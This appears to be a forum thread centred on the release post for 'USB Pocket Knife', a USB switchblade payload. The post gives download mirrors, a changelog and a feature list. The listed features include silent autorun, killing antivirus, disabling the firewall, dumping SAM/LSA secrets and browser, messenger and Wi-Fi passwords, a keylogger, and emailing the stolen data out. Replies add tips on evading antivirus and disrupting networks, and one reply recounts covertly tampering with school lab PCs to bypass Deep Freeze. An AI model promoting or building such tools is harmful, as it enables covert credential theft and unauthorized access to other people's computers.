Leapo

Reserved for future use by OP due to character limits...

Download Payload: Here' s where you'll find the most recent full build of my payload; I'll try to keep this as up-to-date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts. Current Version: USB Pocket Knife 0.8.8.0 by Leapo Release Date: October 6, 2008 Download Mirrors: MegaUpload, and RapidShare Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!! Payload Change Log: October 6, 2008: Pocketknife 0.8.8.0 Released Change 0: Payload can now be set to shutdown the PC after its finished. Change 1: Now dumps Google Chrome passwords. Change 2: New profile management system, save up to 3 payload configurations! Change 3: If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found. Change 4: made some cosmetic fixes to Menu.bat. September 28, 2008: Pocketknife 0.8.7.0 Released Change 0: Backup Script in menu.bat works again. Change 1: Auto-Update script in menu.bat works again. Change 2: Many path errors fixed. Change 3: Added OS detection to increase compatibility. Change 4: Slurp now uses variables instead of hard paths to improve compatibility. Change 5: Slurp now grabs data from Pidgen. Change 6: Prebuilt U3 ISO included! September 19, 2008: Pocketknife 0.8.6.5 Released Change 0: Invalid directory name broke just about all of 0.8.6.0, this has been corrected. Change 1: AVKill's executable was missing from the U3 version of the payload. Change 2: File Copiers executable was missing entirely. September 15, 2008: Pocketknife 0.8.6.0 Released Change 0: Fixed U3 compatibility (was broken in 0.8.5.5) Change 1: Slurp 2 should now work properly. September 17, 2008: Pocketknife 0.8.5.5 Released Change 0: Fixed "Port Scan" not running correctly. Change 1: PwDump failing to create service. Change 2: FgDump failing to output anything. Change 3: Firepassword updated, now works with Firefox 3.0 Change 4: PwDump Updated to 1.7.2 Change 5: FgDump updated to 2.1.0 September 14, 2008: Pocketknife 0.8.5.0 Released Change 0: Animation_1.cfg was missing, causing some features of menu.bat to malfunction. Change 1: Fixed an ordering issue in Start.bat. Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running. Change 4: Fixed a typo preventing the "Dump Updates-List" module from running. Change 5: Fixed "Dump Mail passwords" not running correctly. Change 6: Fixed "Dump Network passwords" not running correctly. Change 7: Fixed "Dump Messenger passwords" not running correctly. Change 8: Fixed "Dump LSA Secrets" not running correctly. Change 9: AVKill Should now operate silently. Change 10: File structure created by slurp was cleaned up. Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all). September 11, 2008: Pocketknife 0.8.2.0 Released Change 0: Bug causing safety.txt to be ignored fixed. Change 1: "No Disk" errors should be resolved. Change 2: New "disarm' feature to prevent it from starting at all. Change 3: three options on what folder to open after completion: Logs, Root, or None. Change 4: ReadMe brought up to date. Change 5: "Disable Firewall" is now totally silent (disables security center first) August 31, 2008: Pre-Release 0.8.1.0 Released Change 0: Now fully U3 compatible (fixed from v0.8.0.0) Change 1: Menu.bat has been greatly reduced in size. June 09, 2008: Pre-Release 0.8.0.0 Released Change 0: Payload overhauled from the ground up. Change 1: Now fully U3 compatible (broken in this build). Change 2: Menu system overhauled. Change 3: Both versions of the payload launch silently for sure! November 24, 2007: U3 ISO Change 0: Fixed the U3 ISO to launch the payload silently November 10, 2007: Beta 0.6.2.1 Release Change 0: VNC install method updated. Change 1: Backup and Restore Script streamlined. Change 2: Automatic Updates added. Change 3: Centralized Management Interface added. June 20, 2007: Beta 0.4 Release Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software). Change 1: Updated the Readme with new information about the backup and restore function, PLEASE READ THE README! Change 2: Improved and added more comments to the code. Change 3: Fixed various typos in my comments. June 18, 2007: Beta 0.3 Release Change 0: Completely overhauled Slurp and Slurp2.bat Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help). Change 2: Improved and added more comments to the code. Change 3: Fixed various typos in my comments. June 16, 2007: Initial Post Change 0: Initial Release

Known Bugs: Keylogger is currently non-functional Payload may cause No Disk errors on systems with card readers (will be fixed in next version)

Modules In Development: Please Stand By

Introduction: Let me start off by saying that this is NOT YET a final payload, this threads purpose is to serve as a learning experience to me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post. This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least-obvious way possible. Current State and Features: The following is a list of everything included in the payload: Key: - Non-U3 Drives Only - U3 Drives only - Not yet Implemented - Everything Else Features: - Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive. - Full silent autorun with no user interaction for U3 drives. - A "Menu.bat" is included to mange all special functions, modules, and features of the switchblade. - Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found. - Includes TightVNC viewer so you always have it with you. - Includes Notepad++ for easy batch editing. - Includes antidote batch files for Nmap, the Hacksaw, and VNC. - Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs. - A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus. - A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives. - Auto Compress logs as they are generated to save space - Email logs Back to yourself - Optional auto-repack of executable to circumvent AV detection Payload Components: - Runs AVKill (csrss.exe) - Restores the payload to the last backup point - Disables the Windows Firewall Silently - Hides Hidden and System Files - Enables the Remote Desktop service - Dumps general System Info - Dumps the SAM - Dumps LSA secrets - Dumps LSA secrets via an alternate method (less detectable, not as pretty) - Dumps Network Passwords - Dump messenger passwords - Dump IE passwords. - Dump saved wireless keys - Dump URL history - Dump Firefox passwords (Supports Firefox 3)) - Dump Cache Passwords - Dump Current Network Services - Generic Port Scanning - Dumps current external IP - Dumps email, messenger, and general website passwords - Dumps currently installed hot fixes and IE history - Dumps Google Chrome passwords - Installs Hacksaw the usual way - Installs WinVNC client. - Installs Nmap as a service (emails you results like the Hacksaw) - Installs a keylogger which emails its logs off to you daily [broken!] - File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files) - File slurping for various Documents and Media folders. (larger files) - Opens an explorer window to the Documents folder when finished - Automatic update scrip to keep various executables up to date. - Compress logs as they are generated to save space. - Optionally email logs in addition to storing them on the switchblade. - Management interface to manage the various functions of the pocket Knife. - Ability to save up to 3 configuration profiles [New!]

Hehe, that will cause some serious havoc. If you don't want to haul in a full blown PC, you can simply plug a cheap Linksys router or access point into the network and watch the admins scramble around as the DHCP conflicts start rolling in because the Linksys box is remapping everything on the network.

Microsoft chose the wrong time to add this functionality to Windows, that's for sure. Turns out, Windows Vista now actively searches newly inserted removable media (like USB flash drives) for an autorun.ini to execute. Kinda surprised me when Pstart came up all by itself when I plugged in my clean (non-switchblade) flash drive. Yeah, it's kinda useless until someone builds a more Vista compatible switchblade, but it does open up some new doors for those of us who don't have U3 flash drives.

Any way to keep these files from getting wiped out by AV software on a non-u3 drive? I've moded one of my USB Switchblades to dump all its log files to "C:Documents and Settings%currentuser%DesktopLogfiles" so that I can put the entire flash drive in read-only mode, but then I have to remove the switchblade and plug in a clean drive so I can take the dumped logs with me. It works, but I find that it's rather suspicious to be swapping flash drives in-and-out. Anybody know of a better way?

Has he tried downloading via proxy with something like Ultra Surf? If it works, it would probably be faster than sending the episodes to him over IM...

Pick up a cheap USB flash drive and put Portable Firefox on it ;) Firefox has the potential to get around all sorts of restrictions; downloading files, browsing hidden places, getting around web filters...I'm sure you'll find more.

You might also consider having the hacksaw generate rar files with "%computername%.rar" as the name, that should make it far easier to figure out what is coming from where.

Don't know what to tell you, my original code appears to work just fine on every system I've tried it on...

This should open the root of the drive (you'll need to make sure you have nircmd.exe in your X:WIPCMD folder): @echo off start .... nircmd.exe win max ititle "Removeable"

The admins at my high school were the same way; they locked those computers down so tight that usability started becoming an issue. The only drive they didn't block access to was a network hard disk and the CD-ROM drive, they removed the file, edit, and tools menus from Explorer and IE, disabled downloading in IE, severely limited what programs were available from the start menu, and even went as far as to disable right clicking. . . oh, and for some reason they were using Deep Freeze ON TOP of all this garbage. . . At first glance, yeah, it looked like air-tight security. . . but upon further inspection there were a few rather large holes that could be used to open the systems up completely. Depending on how much you wanted to do, there were lots of things that could be done to get around the "security measures" that they have instated. I found out how to get around a few small annoyances (Firefox on a flash drive, for instance, did not share the restrictions on downloading that IE did), but I wanted total control on some of these machines, which meant finding a way around deep freeze and the restrictions imposed by group policies. There was one hole in particular that made the following possible with relative ease: Although the BIOS was locked out, the Bootable Media Selection screen wasn’t, allowing me to boot from a CD or Flash drive. Enter a handy tool called GParted (a Linux based hard disk management tool that runs off of a live CD), I simply booted into GParted, shrunk the existing (frozen) windows partition, and made a new partition in the free space created by shrinking the frozen partition. Upon booting into windows I had 30GB of unrestricted local storage, which was nice, although I was still restricted to what I could install on it because of the restrictions of the machine (tried to install iTunes on the new 30GB partition and got slapped with a box asking for administrator access). At this point I had a radical idea: "hmm, I can create a completely unrestricted 30GB partition on any of the computers here within a matter of minutes, why don't I just install my own OS and get around all this crap?" Well, there were a few problems with this. First, the current boot loader was on the frozen partition. Second, I didn't want an OS selection screen to pop up, because the local administrators would know that the machine had been tampered with. Keeping these things in mind, I dug out a spare Windows 2000 disk and installed it on the new 30GB partition (At this time, all the computers in the lab were running Windows 2000). Now obviously, I couldn't boot to my new install of Windows because the boot loader didn't know it was there (it was reverted by deep freeze), but I was going to use this to my advantage. At this point I had my Windows install on one partition, and the stock Windows install in deep freeze on the other with a boot loader that didn't know my Windows install existed (it didn’t create a duel-boot configuration because the boot loader on C: had been reverted, so the other windows install was just sort of sitting there). To boot my install of Windows, I set up a bootable CD with a boot loader that pointed to my Windows install on the 30GB partition; when I wanted to boot into my unrestricted install of Windows, all I had to do was pop in my "special" CD, hit F12 to get the bootable media selection screen, select the CD-ROM drive, and let the machine start up! The best part was, unless you popped the in CD there was no way to boot into my Windows install, and you couldn’t tell that the system had been altered in any way! I think I set up 4 of the PC's in our computer lab like that. It was a lot of hassle to get set up (although a ghost image of each partition would speed up the process greatly), and after that point, I almost never ran into a situation where all 4 of my altered PC's had been taken at once, as the lab was never all that busy. . . Anyhow, just food for thought. The computer lab at my high school was completely un-supervised because the computers were considered to be so locked down that they figured nothing could really happen (especially with the over-active web filter, that took a little more work to deal with). At most other schools you probably won’t have 3+ hours all to yourself in a computer lab without someone tapping you on the shoulder and asking you what you’re doing.